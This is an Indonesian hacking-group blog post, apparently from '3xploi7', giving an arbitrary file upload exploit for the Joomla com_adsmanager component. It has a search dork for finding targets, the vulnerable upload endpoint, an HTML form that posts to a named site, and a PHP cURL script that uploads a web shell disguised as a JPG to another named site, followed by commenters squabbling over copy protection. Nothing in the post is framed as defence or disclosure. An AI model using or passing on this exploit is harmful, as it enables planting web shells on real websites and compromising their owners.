Joomla Com_Adsmanager Vulnerability - 3xploi7 BuG

Joomla Com_Adsmanager Vulnerability





#- Dork : inurl:com_adsmanager

#- Exploit : /index.php?option=com_adsmanager&task=upload&tmpl=component

#- Vulnerable :
{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_5"}

*Note : Jangan lupa Edit Shellnya Shell.jpg

POC : 

With CSRF / Uploadify 

CSRF :

<form method="POST" action="http://www.muslimbizads.com/index.php?option=com_adsmanager&task=upload&tmpl=component"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>

Uploadify : 

<?php
$url = "http://shelbygrossman.com/wp-content/plugins/the-viddler-wordpress-plugin/js/plupload/examples/upload.php"; // put URL Here$post = array(       "file" => "@jiwax.jpg",       "name" => "jiwa.php");$ch = curl_init ("$url");curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt ($ch, CURLOPT_POST, 1);@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);$data = curl_exec ($ch);curl_close ($ch);echo $data;
?>




#- Shell Result : Here !

3xploi7 Team

2 Responses to "Joomla Com_Adsmanager Vulnerability"

  1. "Saya tidak meminta satu rupiah pun dari anda, Tolong hargai Copyright konten yang ditulis oleh Admin, Jika ingin Copy-Paste tolong sertakan link sumber. Terimakasih :)"

    mikir dikit lah
    bilang saya tidak meminta satu rupiah pun dari anda tapi di pasang one click ads
    bilang jika ingin copy- paste tolong sertakan link sumber ehh kontol artikel lu gak bisa di copy gblk
    hapus aja nih blog kalo ngeshare poc tapi di aktifin anti copy paste
    :) gak guna kntl

    BalasHapus
    Balasan
    1. Mohon maaf atas kekurangannya. Dulu sesudah artikel ini di publish memang blm di pasang anticopas, baru beberapa bulan kemudian karena ada AGC makanya di pasang anti copas. Anda pemain baru ya ? mending diam saja tolong di jaga dek omongannnya. Kalo blog ini gak guna kok masih nengok ilmu kesini ? btw adek marah ya, karna gak bisa KOPAS blog ini ? wkwk. Makasih sarannya :)

      Hapus

Tempat Diskusi

Iklan Atas Artikel

3xploi7 1

seo explanation, online courses on digital marketing, internet marketing classes online

3xploi7 2

Iklan Bawah Artikel

Stay toon disini ya karena artikel akan selalu di update.
Kalau ada masalah silahkan gabung grup
Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya, Jangan sampai Terlewatkan.


• Join Grup Team :
 — Facebook Grup ( 5.325 Anggota )
 — Line Square